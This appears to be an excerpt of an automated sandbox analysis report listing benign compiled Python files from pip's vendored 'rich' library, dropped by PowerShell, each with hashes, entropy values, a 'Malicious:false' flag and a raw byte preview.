                                                                                                    Preview:........=.Cf_.........................@.....d.d.l.m.Z.m.Z.....e.d.........Z...G.d...d.e.e.............Z.y.)......)...List..TypeVar..Tc.....................6.....e.Z.d.Z.d.Z.e.d.e.f.d...........Z.d.e.d.d.f.d...Z.y.)...Stackz.A small shim over builtin list...returnc...........................|.d.....S.).z.Get top of stack........)...selfs.... .cC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_stack.py..topz.Stack.top....s............B.x.........itemNc.....................&.....|.j...................|...........y.).z<Push an item on to the stack (append in stack nomenclature).N)...append).r....r....s.... r......pushz.Stack.push....s..............D...r....)...__name__..__module__..__qualname__..__doc__..propertyr....r....r....r....r....r....r....r........s1.......).........Q............................t.....r....r....N)...typingr....r....r....r....r....r....r......<module>r........s!.......... ....C.L........D...G.....r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):876
                                                                                                    Entropy (8bit):5.484279757460723
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:UCSBfh/oCuljinc57IpPL/u7kSlpirheOWS9GHMXImaaoO/EwIOQWyi+ycz+cLo:3koCdn0Ioblp4/KHu38OM7nycz+co
                                                                                                    MD5:2CD96BDC660BAFF5A6198F99F3CB048C
                                                                                                    SHA1:ABDAC0EFC1B792FA4D6468BDB52D75A54BEB6508
                                                                                                    SHA-256:EECBA38E9996F8A46A7335F526A9A30A8BB57C4EBDBFE410A4A7483DC79820D0
                                                                                                    SHA-512:2904DB2F7A910B76EFEFB16AA2870D1A79597B87A9AAB48648BED2A6919F208A1ED8F2E23F7C148F8862ECD84ED0C2A243DD96983B416D0729399AB0215108E5
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................^.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j...................d.d.e.d.e.d.....f.d...........Z.y.).z-.Timer context manager, only used in debug........)...timeN)...Generator..subject..return).NNNc................#....p...K.....t.................}.d.......t.................|.z...}.|.d.z...}.t.........|...d.|.d...d.............y...w.).z0print the elapsed time. (only used in debugging)Ni....z. elapsed z..1f..ms).r......print).r......start..elapsed..elapsed_mss.... .cC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_timer.py..timerr........s>..............F.E.......f.u.n.G....4...J....W.I.Y.z.#....b..1..2.s.....46.)...__doc__r......contextlib..typingr......contextmanager..strr...........r......<module>r........sC.......................................3.3....3.I..>.$?....3.........3r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28987
                                                                                                    Entropy (8bit):5.236191882444088
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:u7d/kDKWTlt81HjGRI6/x6Q6M76sfkRw5q4aY2AucdhiW12QD:aGpTOCRI5K76sS4aYLucdhiw2QD
                                                                                                    MD5:6B173A834FDE8C3750B3D23CA0B62583
                                                                                                    SHA1:E639DC2B220B8C5AD1C2C009F2158AD7CF0110C1
                                                                                                    SHA-256:E54F37BFEC07B123EAF1CFAF2A4AC0EF779F25EFAD79BC5189628165A96233EE
                                                                                                    SHA-512:CA1190F4CD46C458E3B6237CE104A04B05A8DF59A190F3CD86602F7B5AD0BF1F59AABA0C29DBBD9415CA9537EE9F264808731609A3D1675D512035DB28B887D5
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf$Y.............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.e.e.d.<...e.j...................d.k(..r...e.j...................e.j...........................Z.n...e.e...d.............d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.j4..................Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.j...........................Z e.jB..................jD..................Z#e.jH..................g.e#_%........e.jL..................e#_'........e.f.d.e(d.e.jL..................f.d...Z"e.jB..................jR..................Z*e.jL..................e.jV..................g.e*_%........e.jX..................e*_'........d.e.jL..................d.e(f.d...Z)e.jB..................jZ..................Z.e.jL..................e.j^..................e.jH....................e.e.e.....e...........e.j`..................e.jH..........................g.e._%........e.jX..................e._'........d.e.jL................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2501
                                                                                                    Entropy (8bit):5.633742226828277
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:I/1sjrAtaS5TCgsOphP1eVz6GkoMRepC3YZITEbhyV8mJfXuR4:I/1sjrAamSc9roMRJ3YLVy2H4
                                                                                                    MD5:B0D101484631E8ED6D715AB71E052F00
                                                                                                    SHA1:EF93199BC790ADFF3C1BCF5D612203C1BE865F56
                                                                                                    SHA-256:5969DEE23EFF69F4BEEAA3DCC51BD5922058B6D6F8D462B7B2FC656413B29D7A
                                                                                                    SHA-512:DCAFD0FFD82CE10EB10AE4DFAB3A8086130477262CE94ADC91F6EEA25F5A861F685EC6B1AF8F7F506464769AAABA46DFD4B4A0F05796461E777DCC59C541AA35
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................p.....d.d.l.Z.d.d.l.m.Z...e...G.d...d.................Z...d.d.l.Z.d.d.l.m.Z...e.j...................d.k(..r...e.e.j...........................Z.n.d.Z...e.d...........d.d.l.m.Z.m.Z.m.Z.m.Z...d.e.f.d...Z.e.d.k(..r;d.d.l.Z...e.........Z.d.d.l.m.Z.....e.d...e.j,............................d...............e...e.e...................y.y.#.e.e.e.f.$.r...d.e.f.d...Z.Y..Qw.x.Y.w.)......N)...dataclassc.....................0.....e.Z.d.Z.U.d.Z.d.Z.e.e.d.<.....d.Z.e.e.d.<...y.)...WindowsConsoleFeaturesz.Windows features available.F..vt..truecolorN)...__name__..__module__..__qualname__..__doc__r......bool..__annotations__r............eC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_windows.pyr....r........s........%....B.......(....I.t.....)r....r....)...LibraryLoader..win32z.Not windows).."ENABLE_VIRTUAL_TERMINAL_PROCESSING..GetConsoleMode..GetStdHandle..LegacyWindowsError..returnc.....................4.....t...........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3584
                                                                                                    Entropy (8bit):5.4113460568066465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5/O2CDV/XQjtBv/yL6t/y0x2/yAVq2F+8lJ+Dm0XEPl/lICjx0PVTdK7pbCWC1DX:5Gu5yVq2F2AYCjF+WeDmk
                                                                                                    MD5:AFCCAA723CCA0995775180BFC807E0AF
                                                                                                    SHA1:D5963A09BED67B1410661B8AB3CA9BF097BC2D6B
                                                                                                    SHA-256:387527F25D525C9ECAC15230502AB557CDB4D7F27CB4A992BE3084EEE04C9ED4
                                                                                                    SHA-512:FFAED3B8C2BFF5F7904E11E011E1741541CBA10F8167C395FD1DBD9220D077D778AE54E1F9F44B9C8D8693BC8687EB41225F9182DC9720AA8D68C0076CE01372
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................Z.....d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.e.e.....d.e.d.d.f.d...Z.y.)......)...Iterable..Sequence..Tuple..cast)...LegacyWindowsTerm..WindowsCoordinates)...ControlCode..ControlType..Segment..buffer..term..returnNc..........................|.D...]...\...}.}.}.|.s'|.r.|.j...................|.|.............|.j...................|............1|.}.|.D...]...}.|.d.....}.|.t.........j...................k(..rIt.........t.........t.........t.........t.........f.....|.........\...}.}.}.|.j...................t.........|.d.z...|.d.z........................e|.t.........j...................k(..r.|.j...................d.............|.t.........j...................k(..r.|.j...................t.........d.d.....................|.t.........j...................k(..r.|.j...............................|.t.........j...................k(..r.|.j.................................|.t.........j...................k(..r.|.j!.............................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2371
                                                                                                    Entropy (8bit):5.706717323480733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:GUKXcvGxV82Z72gs9+tViTxcuQheJxPv3mUZnve8WHzTep1TV7+WfWVs3:Nacs6cjvtOihOPu0nve8w6LH
                                                                                                    MD5:284F2417AF010C810FEC349A04DBB696
                                                                                                    SHA1:113BD1F4CD82E74C28B1A04F2F284945C773861C
                                                                                                    SHA-256:D07E74863E161A322F52F81389A825AD646462FAD83C7F8DC1FAA902DD6E4334
                                                                                                    SHA-512:1179563AF1BBF9B11FFB965AB78E63ED5E8E0E9B3C830FAFD1093657C154FAED282590B7A4382A0BEC18F6F39FB66AACD4CC36E3467C00DF02B1162BEC07F103
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf0...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j...................d.........Z.d.e.d.e.e.e.e.e.f.........f.d...Z.d.d.e.d.e.d.e.d.e.e.....f.d...Z.e.d.k(..r2d.d.l.m.Z.....e.d...........Z.e.j)..................d.............e...e.d.d.d.....................y.y.)......N)...Iterable..List..Tuple.....)...loop_last)...cell_len..chop_cellsz.\s*\S+\s*..text..returnc................#........K.....d.}.t.........j...................|.|.........}.|..E|.j...........................\...}.}.|.j...................d.........}.|.|.|.f.......t.........j...................|.|.........}.|....Dy.y...w.).Nr....)...re_word..match..span..group).r......position..word_match..start..end..words.... .bC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_wrap.py..wordsr........sf............H........t.X....J..... ...._._..&.....s............."......S.$..........].].4....-......... .s.....A.A#..!.A#...width..foldc.......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1619
                                                                                                    Entropy (8bit):5.336940417271136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:zbEWlYc/JAMG4kZRD6zZS1jzn7ppF4kDmWR3HDtOR9PWIRFdeygksCk:zbEuJAYkHD6zZS1H7F4kdR3acIxeynHk
                                                                                                    MD5:EAE0C85C65A80BD41688E95F408A5E21
                                                                                                    SHA1:360E7E973DA16C6FABC0F75AF3A75D4369FD9EFF
                                                                                                    SHA-256:16041598E251530854FB7F92669F44142F61FEC81D1B5B9526DC4677699D4C86
                                                                                                    SHA-512:FE5995ABDFAB56E7D939D9ECC4B189ACD74D2328BA11A4815D9A327588B39EE710350BB2D11114D66AAC1F325D1ABCBF6931B757A8BC5C1D8159EA6CF597DD7E
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfz...............................d.d.l.m.Z.....G.d...d.e.........Z.e.d.k(..r[d.d.l.m.Z.....e.........Z...e...e.e.e.....................e...e.e.e.....................G.d...d.........Z...e.........Z...e...e.e.e.....................e...e.d.e...................y.y.)......)...ABCc.....................*.....e.Z.d.Z.d.Z.e.d.e.d.e.f.d...........Z.y.)...RichRenderablea#...An abstract base class for Rich renderables... Note that there is no need to extend this class, the intended use is to check if an. object supports the Rich renderable protocol. For example::.. if isinstance(my_object, RichRenderable):. console.print(my_object).. ..other..returnc.....................6.....t.........|.d.........x.s...t.........|.d.........S.).z6Check if this class supports the rich render protocol...__rich_console__..__rich__)...hasattr)...clsr....s.... .`C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/abc.py..__subclasshook__z.Ric
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12333
                                                                                                    Entropy (8bit):5.569819711528419
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:klWWhNdwLX/qOqF96c8XroA7L+9baWPPojYBjN1/ZPkJLtSAQ:kl/E/qOg45YAUd50LtSR
                                                                                                    MD5:D6F6BEB49A225340EA1C5A54275CF2E8
                                                                                                    SHA1:A4A50D467C069205F2B2047D2AC9CF823D64D7BF
                                                                                                    SHA-256:EA953019AB08602F1C697C44C0772040EA0582E12397B5B97C3C8B0A94BA1082
                                                                                                    SHA-512:5C60419858A5F953595D043CD1236899757D6E0174019E335F79BF533CEF82B04B22311EC8D9FA84C028ED3B2672737A6AE3C4BDCF05484AD625F9CD1DF83F99
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.(........................N.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.....Z.e.d.....Z...G.d...d.e.........Z...G.d...d.e.........Z.e.d.k(..r.d.d.l.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#....e!........Z$..e.........Z...e#..e.e.jK....................e$d.................e.jM....................e$d.................e.jO....................e$d.........................d.d.d...........Z(e.jS..................e.jM..................e(d.d.e.jT......................................y.y.) .....N)...chain)...TYPE_CHECKING..Iterable..Optional)...........)...Literal.....)...Constrain)...JupyterMixin)...Measurement)...Segment)...StyleType)...Console..ConsoleOptions..RenderableType..RenderResult....left..center..right....top..middle..bottomc..........................e.Z.d.Z.d.Z.....d.d.d.d.d.d...d.d.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....d.e.e.....d.d.f
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9117
                                                                                                    Entropy (8bit):5.649444476746374
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:yqKO68smSbux5XxrMcRvZlopa8jXfLqzR2pQDKjh:yLOLiuxFZDvopjXf+z5+h
                                                                                                    MD5:8D5C79A21E539693CC9EAA77631531F5
                                                                                                    SHA1:AA305197644B1FADD56D8A1967C39FCCBAD6CAA4
                                                                                                    SHA-256:4912F06A72D45BE50A62629A2F58D0EBC1B52DD8E80A7FD31037C2E1500702C1
                                                                                                    SHA-512:8B25799A030555EB80A4B0E783319DB21AEB91AECA5B2C84669B9D7F44CCF3B90E549D5BFB361791BD9300E4CB2EEF541A165DA45C330BADC8EED1428C5F8099
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.e.j...........................Z...G.d...d.e.........Z.d.e.d.e.e.....f.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..d-d...i.d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF..dGdH..dIdJ..dKdL..dMdN..dOdP....i.dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh..didj..dkdl..dmdn..dodp..dqdr....dsdtdudvdwdxdy....Z...G.dz..d{........Z.e.j,..................d|k7..r.e.d}k(..r.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...e.........Z...e.j8..........................Z.d~e.d.e.f.d...Z ..e.jB..................e.jD..................d.d...e ..........d.d.l#m$Z$....e$d...........Z#e.jK..........................jM..................d.........Z'..e(e'..........e.jM..................e'........D.]...Z)e#jQ..................e)..............e#jU..................d.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4283
                                                                                                    Entropy (8bit):5.462556795610234
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:hUJs3zPgRSmLOazp4umD4xpRzumvPAhiP:Ka3zPHmbzp4OzfPAhM
                                                                                                    MD5:A673D30977B22BEBE3BEAC24A40E9746
                                                                                                    SHA1:110DEF66293E8819894F60D6B0E2AF7C5D41A6B7
                                                                                                    SHA-256:238B8FB3A900BF8AAED65D8E6B4F7853DAF16667F34BB990F8AEE78C8164C909
                                                                                                    SHA-512:C177FF459E546D25DF925ABA0D6DF472078B046F2834E110B382C720C62C548A52241CBDD759C8A9F034BB3F113737830416949C34084870714E91C03A5E4F53
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.g.d...Z.d.Z...G.d...d.e.........Z.y.)......)...Optional..Union.....)...Color)...Console..ConsoleOptions..RenderResult)...JupyterMixin)...Measurement)...Segment)...Style).......r....r..........r....r..........r....)... u.....u.....u.....u.....u.....u.....u.....r....c..........................e.Z.d.Z.d.Z.d.d.d.d...d.e.d.e.d.e.d.e.e.....d.e.e.e.f.....d.e.e.e.f.....f.d...Z.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.y.)...Bara....Renders a solid block bar... Args:. size (float): Value for the end of the bar.. begin (float): Begin point (between 0 and size, inclusive).. end (float): End point (between 0 and size, inclusive).. width (int, optional): Width of the bar, or ``None`` for maximum width. Defaults to None.. color (Union[Color, str], optional): Color of the bar. Defaults t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11869
                                                                                                    Entropy (8bit):5.752409175906848
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:oBPVAhy3FnC0oBDvUhyk1rUxHBhEMzqC2kEHsFZxVfcS+ShOGOr7bO:oBPVAhy3JC0ofogHPFGvsFZHfcS+SY76
                                                                                                    MD5:BAAA854448CA9117D54C48C247341CF5
                                                                                                    SHA1:76A5F8F4F20258FF443385061624E4CF1DAC43D8
                                                                                                    SHA-256:214D4DFD234F500DE31BDA1B823382B6EDDA8D588725E824271B7F71595ED78F
                                                                                                    SHA-512:85BBB3F9330EFAEC4154B381E4A468F0521999F8CCE4ED575561047ACF9152ACB76C9644902AA5E4C57CE75644D467367CDD007B57936DC6E049475FAFDCD37F
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfr&..............................U.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z...e.d.d...........Z.e.e.d.<.....e.d.d...........Z.e.e.d.<.....e.d.d...........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d.........Z.e.e.d.<.....e.d ........Z.e.e.d!<.....e.d"........Z.e.e.d#<.....e.d$........Z.e.e.d%<.....e.d&........Z.e.e.d'<.....e.d(........Z.e.e.d)<.....e.d*........Z.e.e.d+<.....e.d,........Z.e.e.d-<.....e.d.........Z.e.e.d/<.....e.d0d...........Z e.e.d1<...e.e.e.e.e.e.e.e.e.e.e.e.i.Z!e.e.e.e.e.e.e.e.e.e.i.Z"e#d2k(....r.d.d3l$m%Z%..d.d4l&m'Z'..d.d5l(m)Z)..d.d6l*m+Z+..d.d7l,m-Z-..d.d8l.m/Z/....e+d..9........Z*g.d:..Z0e*jc....................e'd;d<.=........d>.?..........e*jc..............................e%d.d@.A........Z2..e3e0........D.]...Z4..e-d.dBdCd..D........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5629
                                                                                                    Entropy (8bit):5.794743688295827
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:0kHL3o4UOlYNUnb7GbkTqThkclMF8ubSRnKuIy3UM6:0J9WlTqvCFtbSRnKBHM6
                                                                                                    MD5:9F1C5E4D78DAD7D3027AF0B3AEEE3A86
                                                                                                    SHA1:148A0F0F8B729FF040070C2DD92507E87692EBAA
                                                                                                    SHA-256:242488AD53FB1B92AACB7A7AB519EFD09E817A859789F9535ED453AD5A43690D
                                                                                                    SHA-512:D0E0191BC4CC09687CAE31BFEB56E6DF30B457D3302D7FE9F025A2424F0D5780793A84614BBA75491D937C172E05A6B8858847725D951D990EBF4D06C41C6959
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j...................d.........j...................Z...e.d.........d.e.d.e.f.d...........Z.e.f.d.e.d.e.e.g.e.f.....d.e.f.d...Z...e.d...........d.e.d.e.f.d...........Z...e.d...........d.e.d.e.f.d...........Z.d.e.d.e.d.e.f.d...Z.d.d.e.d.e.d.e.d.e.e.....f.d...Z.e.d.k(..rQ..e...e.d.....................e.d.d.........D.]...Z...e.e.................e.d.d.d.........D.]...Z...e...e.d.e.........d.z...............e.d.e.z..............!..y.y.) .....N)...lru_cache)...Callable..List.....)...CELL_WIDTHSu....^[ -o...-.]*$i......text..returnc.....................<.......t...........t...........f.d...|.D.................}.|.S.).a/...Get the number of cells required to display text... This method always caches, which may use up a lot of memory. It is recommended to use. `cell_len` over this method... Args:. text (str): Text to display... Returns:. int: Get the number of cells requir
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26581
                                                                                                    Entropy (8bit):5.775909047118684
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PebG0uV5npWx2J0amdMt4+wgt+3e4gtDTjljLSjV19zksepyNsWPWdub6IHSjg0q:Peb1K5uWw0+O4Opj+x19gsepGskVb/e2
                                                                                                    MD5:7B36506845DA4FF0E649C8DFADB69D52
                                                                                                    SHA1:5FF2FC5A8DDA92C8E271E63F9DD8EF8D838BFB68
                                                                                                    SHA-256:F7A8BEF5D9A74F96C87C4B50C48700F7AF97F76EFF5B1C1956D07589B0F8E4AD
                                                                                                    SHA-512:2D85CE89129396B8FFD1C58EE03D50134F803D50FCAA599BF91A41DEAEE51991C878931F7EC230F37276197330338271B30AB7801C0A62ACC36254EED80612B3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf0G.............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z.....e.j6..........................d.k(..Z...G.d...d.e.........Z...G.d...d.e.........Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..i.d2d1..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF..dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR....i.dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh..didj..dkdl..dmdn..dodp..dqdr..dsdt....i.dudv..dwdx..dydx..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1712
                                                                                                    Entropy (8bit):5.643959041559412
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KldMn6ux7Le3nnH366kBzuH3JJQpHGYOh1tcG9SmUgORRDFQTF6lJmeI:Klde6u+3HkBSX0Qp1t39FOLDz7RI
                                                                                                    MD5:9BE0DE67AE416C727AA5F74BC6F64A2D
                                                                                                    SHA1:409EC1F91A66B722EE6B1BF86220FAB6EC6CC92B
                                                                                                    SHA-256:C8B4C6C3A3ECA039B2105D8850FE686AEBBFD45F7FE8C342A21CA832D22AED91
                                                                                                    SHA-512:66A0D886F043F7AE4880E9909C3BB9DFF71BC169BF0146BD8E5288CFAB2F839853407DC3D87A6663BB6FDEABA0CFFF1D17564F26350BFA8D7EE720A6B10733BD
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................*.....d.d.l.m.Z.m.Z.....G.d...d.e.........Z.y.)......)...NamedTuple..Tuplec..........................e.Z.d.Z.U.d.Z.e.e.d.<.....e.e.d.<.....e.e.d.<.....e.d.e.f.d...........Z.e.d.e.f.d...........Z.e.d.e.e.e.e.f.....f.d...........Z.y.)...ColorTripletz/The red, green, and blue components of a color...red..green..blue..returnc.....................&.....|.\...}.}.}.d.|.d...|.d...|.d.....S.).z#get the color triplet in CSS style...#..02x......selfr....r....r....s.... .jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/color_triplet.py..hexz.ColorTriplet.hex....s+......... ......U.D....3.s.).E.#.;.t.C.j..1..1.....c.....................&.....|.\...}.}.}.d.|...d.|...d.|...d...S.).znThe color in RGB format... Returns:. str: An rgb color, e.g. ``"rgb(100,23,255)"``.. z.rgb(..,..)r....r....s.... r......rgbz.ColorTriplet.rgb....s+......... ......U.D....c.U.!.E.7.!.D.6....+..+r....c...........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8598
                                                                                                    Entropy (8bit):5.705172973549459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ezg7NcDT2NJskRxGRB/XdOdr7FukHrYI+36kAJJ:Og7NcDT2NJs/XdGrtHrYjqJJJ
                                                                                                    MD5:DFD1BBE8E99A354815AA8443FF0F4746
                                                                                                    SHA1:A25A7CA907F4DC69256572236476330544D74217
                                                                                                    SHA-256:DE71ACFA8BA4ACC962D43B253FEA52A8586B63D9C493C5D8DA9DC8DD831E85DB
                                                                                                    SHA-512:EFECB252F346AC31FCCAA1F0A9F2039A574430C8AA7860702D168A1AF90464878AA05B2B96486290F577A12787E6CFCDE29D504605146AB95CC01A853547EA05
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................@.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ....G.d...d.e ........Z!e"d.k(..r.d.d.l#Z#..e.........Z...e$..e%..e#jL..........................................D.....c.g.c.]...\...}.}.|...d.|...........c.}.}.Z'..e!e'd.d.d...........Z(e.jS..................e(..........e.jU............................d.e(_+........e.jS..................e(..........d.e(_,........e.jU............................e.jS..................e(..........y.y.c...c.}.}.w.)......)...defaultdict)...chain)...itemgetter)...Dict..Iterable..List..Optional..Tuple.....)...Align..AlignMethod)...Console..ConsoleOptions..RenderableType..RenderResult)...Constrain)...Measurement)...Padding..PaddingDimensions)...Table)...TextType)...JupyterMixinc..........................e.Z.d.Z.d.Z.....d.d.d.d.d.d.d.d.d...d.e.e.e.........d.e.d.e.e.....d.e.d.e.d.e.d.e.d.e.e..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):113804
                                                                                                    Entropy (8bit):5.548968816464091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:nytwc3+aG/gG9G1SPJZ9TVik1cw+Wja0AsxVGT4VGzKrarKouWWD:n2wcvS398ShxHa0RG4wKr4KpD
                                                                                                    MD5:E8054EF87CF1B6ABBB41F39E987C61DF
                                                                                                    SHA1:77345BDA7923DA1AD35A5D9D7CFB47618388A144
                                                                                                    SHA-256:CDF466CCD8AEA09F08DF077524140278A18DFCD80131B46C62E7DA9D59DEEC69
                                                                                                    SHA-512:2ABEDDB7C58BF4BB8BFE3F25E21131DAD24B0D245A1311FF1A1DDAFEA519B0D2BFA5FB5AA6C984A90292EF4E4B765AEC54EA5F607B25BA149E57C9CB3DCFE79F
                                                                                                    Malicious:false
